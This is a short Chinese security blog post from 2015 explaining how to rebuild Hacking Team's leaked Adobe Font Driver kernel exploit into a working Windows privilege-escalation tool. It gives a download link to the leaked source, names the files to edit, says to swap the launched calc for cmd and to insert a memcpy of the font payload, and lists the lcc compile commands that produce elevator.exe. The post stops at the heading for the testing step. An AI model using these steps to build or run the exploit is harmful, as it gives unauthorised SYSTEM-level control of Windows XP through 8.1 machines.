Hacking Team Adobe Font Driver 提权 快速利用介绍
三好学生 | 2015-07-15 11:22
0x00 目标
利用Hacking Team 的Adobe Font Driver内核漏洞代码,重新编译,获得系统权限。
0x01 测试环境
Windows 7 (32-bit)
0x02 样本分析
已知成功环境:
WindowsXP~Windows 8.1,X86和X64
0x03 样本测试
无
0x04 简单修改
此处举例说明如何修改source_pie_7:
1、下载代码
http://ht.transparencytoolkit.org/gitlab/Windows-Multi-Browser/2_stage_shellcode_source/
2、搭建开发环境
安装lcc.exe
3、修改文件
进入source_pie_7文件夹
编辑elevator.c:
去掉#include "font.h"(减小文件体积)
编辑loader.c:
添加#include "font.h"(添加字体文件)
L104 calc改为cmd(执行calc改为cmd)
在void Loader()第三行插入memcpy(pVtable.lpLoaderConfig->foofont,foofont,755256);(赋值)
4、编译
compile.bat写入如下代码,运行后生成elevator.exe
c:\lcc\bin\lcc.exe -c elevator.c
c:\lcc\bin\lcc.exe -c loader.c
c:\lcc\bin\lcclnk.exe -subsystem console -o elevator.exe elevator.obj loader.obj wtsapi32.lib crypt32.lib wininet.lib
del elevator.obj elevator.exp elevator.lib
del loader.obj loader.exp loader.lib
5、测试